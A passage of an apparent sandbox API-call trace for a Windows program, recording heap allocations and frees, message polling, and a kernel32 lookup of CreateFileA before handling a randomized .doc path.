lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.181] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0034.181] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.182] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.182] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0034.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0034.182] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0034.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.185] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.187] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0034.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8b0 [0034.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0034.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.188] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0034.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c8b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.188] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0034.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", cchWideChar=116, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 116 [0034.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74) returned 0x7800d0 [0034.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", cchWideChar=116, lpMultiByteStr=0x7800d0, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", lpUsedDefaultChar=0x0) returned 116 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0034.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 